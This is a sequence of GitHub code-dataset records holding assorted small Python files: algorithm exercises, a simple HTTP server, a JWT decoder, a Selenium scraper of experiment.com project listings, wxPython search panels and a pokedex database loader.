plot_loss_history(self, ax=None):\n if not ax:\n fig = plt.figure(figsize=(7, 5))\n ax = fig.add_subplot(111)\n ax.semilogy(range(len(self.history)), self.history, 'k-')\n ax.set_xlabel('$n_{epoch}$')\n ax.set_ylabel('$\\\\phi^{n_{epoch}}$')\n plt.show()\n","repo_name":"lukas90275/PINN","sub_path":"pinn_solver.py","file_name":"pinn_solver.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32279795138","text":"from typing import List\n\n# https://leetcode.com/problems/combination-sum-ii/description/\n\n# Given a collection of candidate numbers (candidates) and a target number (target),\n# find all unique combinations in candidates where the candidate numbers sum to target.\n\n# Each number in candidates may only be used once in the combination.\n\n# Note: The solution set must not contain duplicate combinations.\n\n# Example 1:\n# Input: candidates = [10,1,2,7,6,1,5], target = 8\n# Output:\n# [\n# [1,1,6],\n# [1,2,5],\n# [1,7],\n# [2,6]\n# ]\n\n# Example 2:\n# Input: candidates = [2,5,2,1,2], target = 5\n# Output:\n# [\n# [1,2,2],\n# [5]\n# ]\n\n# Constraints:\n# 1 <= candidates.length <= 100\n# 1 <= candidates[i] <= 50\n# 1 <= target <= 30\n\n\ndef combinationSum2(candidates: List[int], target: int) -> List[List[int]]:\n \"\"\"\n Time -> O(NlogN)\n Space -> O(N)\n \"\"\"\n if len(candidates) < 2:\n return [candidates] if candidates[0] == target else []\n\n combinations = []\n\n # assume not sorted\n candidates.sort()\n\n def dfs(nums, target, combination, combinations):\n if target < 0:\n return\n\n if target == 0:\n combinations.append(combination)\n return\n\n for i in range(len(nums)):\n # skip larger values than target\n if nums[i] > target:\n continue\n # skip if previous value is duplicate\n if i >= 1 and nums[i] == nums[i - 1]:\n continue\n # skip repeated value thus i+1\n dfs(nums[i + 1 :], target - nums[i], combination + [nums[i]], combinations)\n\n dfs(candidates, target, [], combinations)\n return 
combinations\n\n\nif __name__ == \"__main__\":\n candidates = [10, 1, 2, 7, 6, 1, 5]\n target = 8\n output = [[1, 1, 6], [1, 2, 5], [1, 7], [2, 6]]\n\n print(combinationSum2(candidates, target))\n","repo_name":"DavidNgugi/dsa-practice","sub_path":"problems/backtracking/combination_sum_2.py","file_name":"combination_sum_2.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35023223825","text":"def first(inputLines):\n score = 0\n enemyChoosesA = {'X': 3, 'Y': 6, 'Z': 0}\n enemyChoosesB = {'X': 0, 'Y': 3, 'Z': 6}\n enemyChoosesC = {'X': 6, 'Y': 0, 'Z': 3}\n selectedShape = {'X': 1, 'Y': 2, 'Z': 3}\n\n for line in inputLines:\n if line[0] == 'A':\n score += enemyChoosesA[line[2]]\n elif line[0] == 'B':\n score += enemyChoosesB[line[2]]\n elif line[0] == 'C':\n score += enemyChoosesC[line[2]]\n score += selectedShape[line[2]]\n\n print(score)\n\ndef second(inputLines):\n score = 0\n enemyChoosesA = {'X': 3, 'Y': 1, 'Z': 2}\n enemyChoosesB = {'X': 1, 'Y': 2, 'Z': 3}\n enemyChoosesC = {'X': 2, 'Y': 3, 'Z': 1}\n\n roundEnd = {'X': 0, 'Y': 3, 'Z': 6}\n\n for line in inputLines:\n if line[0] == 'A':\n score += enemyChoosesA[line[2]]\n elif line[0] == 'B':\n score += enemyChoosesB[line[2]]\n elif line[0] == 'C':\n score += enemyChoosesC[line[2]]\n score += roundEnd[line[2]]\n\n print(score)\n\nif __name__ == \"__main__\":\n with open('in.txt') as f:\n lines = f.read().splitlines()\n\n first(lines)\n second(lines)","repo_name":"krasiren/Aoc","sub_path":"2022/days 1-9/day2/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24080099390","text":"import sys\ninput = sys.stdin.readline\n\nn,m=map(int,input().split())\narr=list(map(int,input().split()))\ndp=[0]*(n+1)\ncount=0\n# for i in range(n):\n# dp[i+1]=dp[i]+arr[i]\n# for i in range(0,n+1):\n# # print(i,\"번째\")\n# for j in range(1,n-i+1):\n# if (dp[j+i] - dp[j - 1])%m==0:\n# count+=1\n# # print(dp[j+i] - dp[j - 1])\n# print(count)\n\nfor i in range(1,n+1):\n part=sum(arr[:i])\n if part%m==0:\n count+=1\n # print(i,\"번째\")\n for j in range(0,n-i):\n part=part-arr[j]+arr[j+i]\n # print(part)\n if part%m==0:\n count+=1\n # print()\nprint(count)\n\n\nimport sys\ninput = sys.stdin.readline\nn, m = map(int, input().split())\nnum = list(map(int, input().split())) + [0]\nr = [0] * m\n\nfor i in range(n):\n num[i] += num[i - 1]\n r[num[i] % m] += 1\n\ncnt = r[0]\n\nfor i in r:\n cnt += i * (i - 1) // 2\n\nprint(cnt)","repo_name":"Leesungsup/algo-test","sub_path":"나머지합.py","file_name":"나머지합.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"45315411306","text":"import jwt\nimport yaml\n\ndef get_token_payload(token):\n payload = dict()\n try:\n with open('./data/token/test.conf', 'r') as fp:\n config = yaml.load(fp).get('encryption')\n payload = jwt.decode(token, config.get('key'), config.get('algorithm'))\n except Exception as e:\n raise str(e)\n finally:\n return payload\n\n","repo_name":"kalicodextu/exercises","sub_path":"test_pro/test_suits/jwt_base.py","file_name":"jwt_base.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4087806795","text":"#!/usr/bin/env python3\nimport random\nimport argparse\n\ndef 
pair_names(names_list):\n if not names_list:\n return \"The list is empty. No pairs can be made.\"\n\n random.shuffle(names_list)\n\n paired_names = []\n\n for i in range(0, len(names_list)-1, 2):\n paired_names.append((names_list[i], names_list[i+1]))\n\n if len(names_list) % 2 == 1:\n single_person = names_list[-1]\n return paired_names, f\"{single_person} does not have a pair.\"\n\n return paired_names, None\n\n\n\ndef main(input_file, output_file):\n try:\n with open(input_file, 'r') as file:\n list_of_names = [line.strip() for line in file]\n except Exception as e:\n print(f\"Error reading the input file: {e}\")\n return\n\n if not list_of_names:\n print(\"The list is empty. No pairs can be made.\")\n return\n\n pairs, single_info = pair_names(list_of_names)\n\n try:\n with open(output_file, 'w') as file:\n for i, pair in enumerate(pairs, 1):\n file.write(f\"Pair {i}: {pair[0]} -> {pair[1]}\\n\")\n if single_info:\n print(\"There is a person without a pair.\")\n file.write(single_info + '\\n')\n except Exception as e:\n print(f\"Error writing to the output file: {e}\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Pairing names from input file and writing the pairs to output file.\")\n\n parser.add_argument('input_file', type=str, help='Path to the input file containing names')\n parser.add_argument('output_file', type=str, help='Path to the output file for saving pairs')\n\n args = parser.parse_args()\n\n main(args.input_file, args.output_file)","repo_name":"iDommel/scripts","sub_path":"make_pairs/make_pairs.py","file_name":"make_pairs.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7621008899","text":"class Game:\n\n def __init__(self, path):\n f = [x.replace('\\n','') for x in open(path).readlines()]\n if(len(f) == 0):\n raise \"invalid game file\"\n \n\n self.num_actions_col = None\n self.max_reward = None\n self.game_matrix = []\n for line in f:\n values = map(int,line.split(' '))\n #validating game matrix \n if self.num_actions_col == None:\n self.num_actions_col = len(values)\n elif self.num_actions_col != len(values):\n raise \"number of plays for column player does not match\"\n self.max_reward = max(self.max_reward, max(values))\n self.game_matrix.append(values)\n self.num_actions_row = len(f)\n\n def reward(self,action_row, action_col):\n return self.game_matrix[action_row][action_col]\n \n def ratio_of_maximum(self,reward):\n return float(reward)/self.max_reward\n","repo_name":"thiagobell/RLCoordinationGames","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74359575303","text":"from http.server import HTTPServer, SimpleHTTPRequestHandler\r\nfrom random import random, seed\r\nfrom urllib.parse import urlparse\r\n\r\nseed(1)\r\n\r\nclass MyHttpRequestHandler(SimpleHTTPRequestHandler):\r\n handlers = {\r\n '/temp1': 'do_temp1'\r\n }\r\n\r\n def __init__(self, *args, **kwargs):\r\n super().__init__(*args, directory='./static', **kwargs)\r\n\r\n def do_GET(self):\r\n path = urlparse(self.path).path\r\n handler = self.__class__.handlers.get(path, None)\r\n if handler is not None:\r\n return getattr(self, handler)()\r\n\r\n return super().do_GET()\r\n\r\n def do_temp1(self):\r\n self.send_response(200)\r\n\r\n self.send_header('Content-type', 'text/html')\r\n self.end_headers()\r\n\r\n 
randomTemp = round(random() * 10 + 15, 2)\r\n self.wfile.write(bytes(str(randomTemp), 'utf8'))\r\n\r\n return\r\n\r\nhttpd = HTTPServer(('', 8000), MyHttpRequestHandler)\r\n\r\nhttpd.serve_forever()","repo_name":"gimre/pysense","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41356745527","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nGiven a binary array, find the maximum number of consecutive 1s in this array.\n\nExample 1:\nInput: [1,1,0,1,1,1]\nOutput: 3\nExplanation: The first two digits or the last three digits are consecutive 1s.\n The maximum number of consecutive 1s is 3.\nNote:\n\nThe input array will only contain 0 and 1.\nThe length of input array is a positive integer and will not exceed 10,000\n\"\"\"\n\n\nclass Solution:\n def findMaxConsecutiveOnes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n 遍历,累加,判断大小\n\n >>> test1 = [1,1,0,1,1,1]\n >>> s = Solution()\n >>> s.findMaxConsecutiveOnes(test1)\n 3\n \"\"\"\n sum_ = 0\n l = len(nums)\n max_ = 0\n for i in range(l):\n if nums[i] == 1:\n sum_ += 1\n else:\n sum_ = 0\n if sum_ > max_:\n max_ = sum_\n return max_\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod(verbose=True)\n","repo_name":"misslibra/algorithms","sub_path":"python/max-consecutive-ones.py","file_name":"max-consecutive-ones.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"11058737529","text":"import sys\nn = int(sys.stdin.readline())\nstack = []\n\n\ndef push(a):\n stack.append(a)\n\n\ndef pop():\n if len(stack) == 0:\n return -1\n return stack.pop()\n\n\ndef size():\n return len(stack)\n\n\ndef empty():\n if len(stack) == 0:\n return 1\n return 0\n\n\ndef top():\n if len(stack) == 0:\n return -1\n return stack[-1]\n\n\nfor _ in range(n):\n il = sys.stdin.readline().split()\n if il[0] == \"push\":\n push(il[1])\n elif il[0] == \"pop\":\n print(pop())\n elif il[0] == \"size\":\n print(size())\n elif il[0] == \"empty\":\n print(empty())\n else:\n print(top())\n","repo_name":"jjhh0210/PythonStudy","sub_path":"practice_src/baekjoon/10828_stack.py","file_name":"10828_stack.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25712864745","text":"def reverseVowels(s):\n total_vowels = 'AEIOUaeiou' # 元音字母\n list_s = list(s)\n start = 0 # 列表开头\n end = len(s)-1 # 列表末尾\n\n while start < end: \n if list_s[start] not in total_vowels: # 从列表首到尾,判断是否是元音字母,不是的index加1\n start += 1\n elif list_s[end] not in total_vowels: # 从列表尾到首,判断是否是元音字母,不是的index减一\n end -= 1 \n else: # 当两边都是元音字母时交换 \n list_s[start], list_s[end] = list_s[end], list_s[start]\n start += 1\n end -= 1\n return ''.join(list_s)\n","repo_name":"sunshine-sjd/LeetCode","sub_path":"reverse-vowels-of-a-string.py","file_name":"reverse-vowels-of-a-string.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12661904722","text":"'''\r\nAuthor: Thomas Grant\r\nCopyright: © 2023 Thomas Grant\r\nLicense: MIT License\r\n'''\r\n# Libraries\r\nimport logging\r\n\r\n# Setup a local logging system for troubleshooting\r\ndef setup_logging(app):\r\n file_handler = logging.FileHandler('../app.log')\r\n app.logger.addHandler(file_handler)\r\n 
app.logger.setLevel(logging.INFO)","repo_name":"thomas-um-grant/audit-log-service","sub_path":"api/src/helpers/loggings.py","file_name":"loggings.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9645145041","text":"import numpy as np\nfrom spt3g import core, calibration, dfmux\nfrom scipy.optimize import curve_fit\nimport argparse\nimport pickle\n\nparser = argparse.ArgumentParser()\nparser.add_argument('asdintrans',\n help='Name of file containing ASDs to fit for in-transition '\n 'data.')\nparser.add_argument('asdhorizon',\n help='Name of file containing ASDs to fit for horizon data.')\nparser.add_argument('outfile',\n help='Name of output file to save.')\nargs = parser.parse_args()\n\nnormal_data = list(core.G3File(args.asdintrans))\nhorizon_data = list(core.G3File(args.asdhorizon))\n\nf_min = 0.01\nf_max = 60\n\n# noise model\ndef noise_model_full(x, readout, A, alpha, photon, phonon, tau):\n return np.sqrt(readout**2 + (A * (x)**(-1*alpha)) + (photon**2 + phonon**2) / (1 + 2*np.pi*(x*tau)))\ndef full_readout_model(x, readout, A, alpha):\n return np.sqrt(readout**2 + (A * (x)**(-1*alpha)))\n\n# fits to horizon data\nfreq = np.array(horizon_data[1][\"ASD\"]['frequency']) / core.G3Units.Hz\nfit_params_horizon = {}\n\njbolo = 0\nfor bolo in horizon_data[1][\"ASD\"].keys():\n asd = np.array(horizon_data[1][\"ASD\"][bolo])\n if np.all(np.isfinite(asd)):\n try:\n par_normal, cov = curve_fit(full_readout_model,\n freq[(freq>f_min) & (freqf_min) & (freqf_min) & (freqf_min) & (freq modelacc > 0.3:\n if time < 10:\n myScore = int(modelacc*100) + 5\n if 10 < time < 20:\n myScore = int(modelacc*100) + 2\n else:\n myScore = int(modelacc*100)\n else:\n myScore = int(modelacc*100)\n # myScore = int(time / (1-modelacc)) #inverse efficiency score\n if answer not in CATEGORIES:\n myScore = 0\n response = {\n 'modelAnswer': CATEGORIES[prediction[0].index(max(prediction[0]))],\n 'myScore': myScore,\n }\n return jsonify(response)\n\n","repo_name":"thecipher18/flaskapp","sub_path":"predict_app.py","file_name":"predict_app.py","file_ext":"py","file_size_in_byte":5881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1810625036","text":"import unittest\nimport os\nfrom rename_files import rename_txt\n\n\nclass RenameTest(unittest.TestCase):\n def setUp(self):\n # create temporal directory with files to rename\n self.path = os.path.join(os.getcwd(), 'temp_dir')\n os.mkdir(self.path)\n self.file1 = os.path.join(self.path, 'file1.txt')\n self.file2 = os.path.join(self.path, 'file2.txt')\n with open(self.file1, 'w') as f:\n f.write('test')\n with open(self.file2, 'w') as f:\n f.write('test')\n\n def test(self):\n # test the files exist\n self.assertTrue(os.path.exists(self.file1))\n self.assertTrue(os.path.exists(self.file2))\n rename_txt(self.path, 'new_')\n # check they have been rename\n self.assertTrue(not os.path.exists(self.file1))\n self.assertTrue(not os.path.exists(self.file2))\n # check they have been rename correctly\n self.new_file1 = os.path.join(self.path, 'new_file1.txt')\n self.assertTrue(self.new_file1)\n self.new_file2 = os.path.join(self.path, 'new_file2.txt')\n self.assertTrue(self.new_file2)\n # remove temporary files and dirs\n os.remove(self.new_file1)\n os.remove(self.new_file2)\n os.rmdir(self.path)\n\n\nif __name__ == '__main__':\n 
unittest.main()\n","repo_name":"MaximoRdz/AUTOMATIZATION","sub_path":".ipynb_checkpoints/test_rename_files-checkpoint.py","file_name":"test_rename_files-checkpoint.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"15126819062","text":"from models import BaseModel\n\nclass RegistryModel(BaseModel):\n table = \"registrys\"\n db = \"console\"\n \n fields={\n \"registry_id\":True,\n \"container_id\":True,\n \"user_name\":True,\n \"user_id\":True,\n \"inspect_container\":True,\n \"run_host\":True,\n \"status\":True,\n \"logs\":True,\n \"update_time\":True,\n 'create_time':True\n }","repo_name":"liuhong1happy/DockerConsoleApp","sub_path":"models/registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"81"} +{"seq_id":"6587107317","text":"from selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom bs4 import BeautifulSoup\nimport requests\nimport urllib2\nimport time\nimport csv\nimport sys\n\ndef elementExistsByTag(tag, parent):\n\ttry:\n\t\tparent.find_element_by_tag_name(tag)\n\texcept NoSuchElementException:\n\t\treturn False\n\treturn True\n\ndef showMoreButton(className, parent):\n\ttry:\n\t\tparent.find_element_by_css_selector(className)\n\texcept NoSuchElementException:\n\t\treturn False\n\treturn True\n\ndef scrollToBottom(driver):\n\tlastHeight = driver.execute_script('return document.body.scrollHeight')\n\tk = 0\n\twhile True:\n\t\tdriver.execute_script('window.scrollTo(0, document.body.scrollHeight);')\n\t\ttime.sleep(15)\n\t\tk = k+1\n\t\t\n\t\tnewHeight = driver.execute_script('return document.body.scrollHeight')\n\t\tif newHeight == lastHeight:\n\t\t\tif showMoreButton('.btn.btn-primary.btn-lg.show-more', driver):\n\t\t\t\tif(k>=30):\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tdriver.find_element_by_css_selector('.btn.btn-primary.btn-lg.show-more').click()\n\t\t\telse:\t\n\t\t\t\tbreak\n\t\telse:\n\t\t\tlastHeight = newHeight\n\ndef scrapePage(driver, source):\n\ttime.sleep(5)\n\n\tprojects = driver.find_elements_by_xpath('//div[@data-source=\"discover\"]')\n\n\twith open('experimentdotcom.csv','a') as dump:\n\t\twriter = csv.writer(dump)\n\t\twriter.writerow(['Source', 'Project Link', 'First Name', 'Last Name', 'Organisation'])\n\n\t\tfor project in projects:\n\t\t\tlink = project.find_element_by_class_name('project-card-content').find_element_by_tag_name('h3').find_element_by_tag_name('a').get_attribute('href')\n\n\t\t\tfullName = project.find_element_by_class_name('project-card-footer').find_element_by_class_name('researcher-info').find_element_by_class_name('researcher-description').find_element_by_tag_name('a').text.encode('ascii','ignore').decode('ascii')\n\t\t\tif(len(fullName.split( ))>1):\n\t\t\t\tfirstName = fullName.split( )[0]\n\t\t\t\tlastName = fullName.split( )[1]\n\t\t\telse:\n\t\t\t\tfirstName = fullName.split( )[0]\n\t\t\t\tlastName = \" \"\n\n\t\t\tinstitution = project.find_element_by_class_name('project-card-footer').find_element_by_class_name('researcher-info').find_element_by_class_name('researcher-institution').find_element_by_class_name('institution')\n\n\t\t\tif elementExistsByTag('a', institution):\n\t\t\t\tplace = institution.find_element_by_tag_name('a').text.encode('ascii','ignore').decode('ascii')\n\t\t\telse:\n\t\t\t\tplace = 
institution.text.encode('ascii','ignore').decode('ascii')\n\n\n\t\t\twriter.writerow([source, link, firstName, lastName, place])\n\n\n\n\npath = 'path/to/chromedriver.exe'\nurl = 'https://experiment.com/discover'\ndriver = webdriver.Chrome(path)\ndriver.get(url)\n\ndriver.maximize_window()\nscrollToBottom(driver)\nscrapePage(driver, url)\ndriver.quit()\n\n","repo_name":"kelvingakuo/Crowd-Funding-Bots","sub_path":"ExperimentDotComScraper/experimentDotComScraper.py","file_name":"experimentDotComScraper.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40085959847","text":"import re, wx\nimport metrics\n\nclass FindPanel(wx.Panel):\n \"\"\"\n This allows the user to enter a search term and select various\n criteria (i.e. \"match case\", etc.) There are two callbacks:\n\n onFind (regexp, flags)\n Regexp corresponds to the user's search, and flags should be used\n when performing that search.\n\n onClose()\n When the user clicks the Close button.\n \"\"\"\n\n def __init__(self, parent, onFind = None, onClose = None):\n self.findCallback = onFind\n self.closeCallback = onClose\n\n wx.Panel.__init__(self, parent)\n sizer = wx.BoxSizer(wx.VERTICAL)\n self.SetSizer(sizer)\n\n # find text and label\n\n findSizer = wx.BoxSizer(wx.HORIZONTAL)\n\n findSizer.Add(wx.StaticText(self, label = 'Find'), flag = wx.BOTTOM | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL, \\\n border = metrics.size('relatedControls'), proportion = 0)\n self.findField = wx.TextCtrl(self)\n findSizer.Add(self.findField, proportion = 1, flag = wx.BOTTOM | wx.EXPAND, \\\n border = metrics.size('relatedControls'))\n sizer.Add(findSizer, flag = wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border = metrics.size('windowBorder'))\n\n # option checkboxes\n\n optionSizer = wx.BoxSizer(wx.HORIZONTAL)\n\n self.caseCheckbox = wx.CheckBox(self, label = 'Match Case')\n self.wholeWordCheckbox = wx.CheckBox(self, label = 'Whole Word')\n self.regexpCheckbox = wx.CheckBox(self, label = 'Regular Expression')\n\n optionSizer.Add(self.caseCheckbox, flag = wx.BOTTOM | wx.RIGHT, border = metrics.size('relatedControls'))\n optionSizer.Add(self.wholeWordCheckbox, flag = wx.BOTTOM | wx.LEFT | wx.RIGHT, \\\n border = metrics.size('relatedControls'))\n optionSizer.Add(self.regexpCheckbox, flag = wx.BOTTOM | wx.LEFT, \\\n border = metrics.size('relatedControls'))\n sizer.Add(optionSizer, flag = wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, \\\n border = metrics.size('windowBorder'))\n\n # find and close buttons\n\n buttonSizer = wx.BoxSizer(wx.HORIZONTAL)\n\n self.closeButton = wx.Button(self, label = 'Close')\n self.closeButton.Bind(wx.EVT_BUTTON, self.onClose)\n\n self.findButton = wx.Button(self, label = 'Find Next')\n self.findButton.Bind(wx.EVT_BUTTON, self.onFind)\n\n buttonSizer.Add(self.closeButton, flag = wx.TOP | wx.RIGHT, border = metrics.size('buttonSpace'))\n buttonSizer.Add(self.findButton, flag = wx.TOP, border = metrics.size('buttonSpace'))\n sizer.Add(buttonSizer, flag = wx.ALIGN_RIGHT | wx.BOTTOM | wx.LEFT | wx.RIGHT, \\\n border = metrics.size('windowBorder'))\n sizer.Fit(self)\n\n def focus(self):\n \"\"\"\n Focuses the proper text input and sets our default button.\n \"\"\"\n self.findField.SetFocus()\n self.findButton.SetDefault()\n\n def updateUI(self, event):\n pass\n\n def onFind(self, event):\n \"\"\"\n Assembles a regexp based on field values and passes it on to our callback.\n \"\"\"\n if self.findCallback:\n regexp = self.findField.GetValue()\n 
flags = None\n\n if not self.caseCheckbox.GetValue():\n flags = re.IGNORECASE\n\n if not self.regexpCheckbox.GetValue():\n regexp = re.escape(regexp)\n\n if self.wholeWordCheckbox.GetValue():\n regexp = r'\\b' + regexp + r'\\b'\n\n self.findCallback(regexp, flags)\n\n def onClose(self, event):\n \"\"\"\n Passes on a close message to our callback.\n \"\"\"\n if self.closeCallback: self.closeCallback()\n\nclass ReplacePanel(wx.Panel):\n \"\"\"\n This allows the user to enter a search and replace term and select\n various criteria (i.e. \"match case\", etc.) There are two callbacks:\n\n onFind (regexp, flags)\n Regexp corresponds to the user's search, and flags should be used\n when performing that search.\n\n onReplace (regexp, flags, replaceTerm)\n Like find, only with a replaceTerm.\n\n onReplaceAll (regexp, flags, replaceTerm)\n Like replace, only the user is signalling that they want to replace\n all instances at once.\n\n onClose()\n When the user clicks the Close button.\n\n You may also pass in a parameter to set whether users can perform\n incremental searches, or if they may only replace all.\n \"\"\"\n\n def __init__(self, parent, allowIncremental = True, \\\n onFind = None, onReplace = None, onReplaceAll = None, onClose = None):\n self.allowIncremental = allowIncremental\n self.findCallback = onFind\n self.replaceCallback = onReplace\n self.replaceAllCallback = onReplaceAll\n self.closeCallback = onClose\n\n wx.Panel.__init__(self, parent)\n\n sizer = wx.BoxSizer(wx.VERTICAL)\n self.SetSizer(sizer)\n\n fieldSizer = wx.FlexGridSizer(2, 2)\n fieldSizer.AddGrowableCol(1, 1)\n\n # find text and label\n\n fieldSizer.Add(wx.StaticText(self, label = 'Find'), \\\n flag = wx.BOTTOM | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL, \\\n border = metrics.size('relatedControls'), proportion = 0)\n self.findField = wx.TextCtrl(self)\n fieldSizer.Add(self.findField, proportion = 1, flag = wx.BOTTOM | wx.EXPAND, \\\n border = metrics.size('relatedControls'))\n\n # replace text and label\n\n fieldSizer.Add(wx.StaticText(self, label = 'Replace With'), \\\n flag = wx.BOTTOM | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL, \\\n border = metrics.size('relatedControls'), proportion = 0)\n self.replaceField = wx.TextCtrl(self)\n fieldSizer.Add(self.replaceField, proportion = 1, flag = wx.BOTTOM | wx.EXPAND | wx.ALIGN_CENTER_VERTICAL, \\\n border = metrics.size('relatedControls'))\n\n sizer.Add(fieldSizer, flag = wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border = metrics.size('windowBorder'))\n\n # option checkboxes\n\n optionSizer = wx.BoxSizer(wx.HORIZONTAL)\n\n self.caseCheckbox = wx.CheckBox(self, label = 'Match Case')\n self.wholeWordCheckbox = wx.CheckBox(self, label = 'Whole Word')\n self.regexpCheckbox = wx.CheckBox(self, label = 'Regular Expression')\n\n optionSizer.Add(self.caseCheckbox, flag = wx.BOTTOM | wx.TOP | wx.RIGHT, \\\n border = metrics.size('relatedControls'))\n optionSizer.Add(self.wholeWordCheckbox, flag = wx.BOTTOM | wx.TOP | wx.LEFT | wx.RIGHT, \\\n border = metrics.size('relatedControls'))\n optionSizer.Add(self.regexpCheckbox, flag = wx.BOTTOM | wx.TOP | wx.LEFT, \\\n border = metrics.size('relatedControls'))\n sizer.Add(optionSizer, flag = wx.LEFT | wx.RIGHT, border = metrics.size('windowBorder'))\n\n # find and close buttons\n\n buttonSizer = wx.BoxSizer(wx.HORIZONTAL)\n\n self.closeButton = wx.Button(self, label = 'Close')\n self.closeButton.Bind(wx.EVT_BUTTON, self.onClose)\n buttonSizer.Add(self.closeButton, flag = wx.TOP | wx.RIGHT, border = metrics.size('buttonSpace'))\n\n if 
allowIncremental:\n buttonSizer.Add(wx.Panel(self))\n self.findButton = wx.Button(self, label = 'Find Next')\n self.findButton.Bind(wx.EVT_BUTTON, self.onFind)\n buttonSizer.Add(self.findButton, flag = wx.TOP | wx.LEFT | wx.RIGHT, \\\n border = metrics.size('buttonSpace'))\n self.replaceButton = wx.Button(self, label = 'Replace')\n self.replaceButton.Bind(wx.EVT_BUTTON, self.onReplace)\n buttonSizer.Add(self.replaceButton, flag = wx.TOP | wx.RIGHT, border = metrics.size('buttonSpace'))\n\n self.replaceAllButton = wx.Button(self, label = 'Replace All')\n self.replaceAllButton.Bind(wx.EVT_BUTTON, self.onReplaceAll)\n buttonSizer.Add(self.replaceAllButton, flag = wx.TOP, border = metrics.size('buttonSpace'))\n\n sizer.Add(buttonSizer, flag = wx.ALIGN_RIGHT | wx.LEFT | wx.RIGHT | wx.BOTTOM, \\\n border = metrics.size('windowBorder'))\n sizer.Fit(self)\n\n def focus(self):\n \"\"\"\n Focuses the proper text input and sets our default button.\n \"\"\"\n self.findField.SetFocus()\n if self.allowIncremental:\n self.replaceButton.SetDefault()\n else:\n self.replaceAllButton.SetDefault()\n\n def onFind(self, event):\n \"\"\"\n Passes a find message to our callback.\n \"\"\"\n if self.findCallback:\n regexps = self.assembleRegexps()\n self.findCallback(regexps['find'], regexps['flags'])\n\n def onReplace(self, event):\n \"\"\"\n Passes a replace message to our callback.\n \"\"\"\n if self.replaceCallback:\n regexps = self.assembleRegexps()\n self.replaceCallback(regexps['find'], regexps['flags'], regexps['replace'])\n\n def onReplaceAll(self, event):\n \"\"\"\n Passes a replace all message to our callback.\n \"\"\"\n if self.replaceAllCallback:\n regexps = self.assembleRegexps()\n self.replaceAllCallback(regexps['find'], regexps['flags'], regexps['replace'])\n\n def onClose(self, event):\n \"\"\"\n Passes on a close message to our callback.\n \"\"\"\n if self.closeCallback: self.closeCallback()\n\n def assembleRegexps(self):\n \"\"\"\n Builds up the regexp the user is searching for. 
Returns a dictionary with\n keys 'find', 'replace', and 'flags'.\n \"\"\"\n result = {}\n result['find'] = self.findField.GetValue()\n result['replace'] = self.replaceField.GetValue()\n result['flags'] = None\n\n if not self.regexpCheckbox.GetValue():\n result['find'] = re.escape(result['find'])\n\n if not self.caseCheckbox.GetValue():\n result['flags'] = re.IGNORECASE\n\n if self.wholeWordCheckbox.GetValue():\n result['find'] = r'\\b' + result['find'] + r'\\b'\n\n return result\n","repo_name":"tweecode/twine","sub_path":"searchpanels.py","file_name":"searchpanels.py","file_ext":"py","file_size_in_byte":10170,"program_lang":"python","lang":"en","doc_type":"code","stars":648,"dataset":"github-code","pt":"81"} +{"seq_id":"28116070565","text":"import csv,sqlite3\n\nmydb = sqlite3.connect('pokedex.db')\ncurs = mydb.cursor()\n\nwith open('pokemon.csv','rt') as poke:\n\treaddata = csv.DictReader(poke)\n\tpokemon = [(i['id'], i['identifier'], i['species_id'], i['height'], i['weight'], i['base_experience'], i['order'],i['is_default'])\n\tfor i in readdata]\ncurs.executemany(\"INSERT INTO POKEMON (id,identifier,species_id,height,weight,base_experience,'order',is_default) VALUES(?,?,?,?,?,?,?,?);\" ,pokemon)\n\nwith open('abilities.csv','rt') as abi:\n\treaddata = csv.DictReader(abi)\n\tabilities = 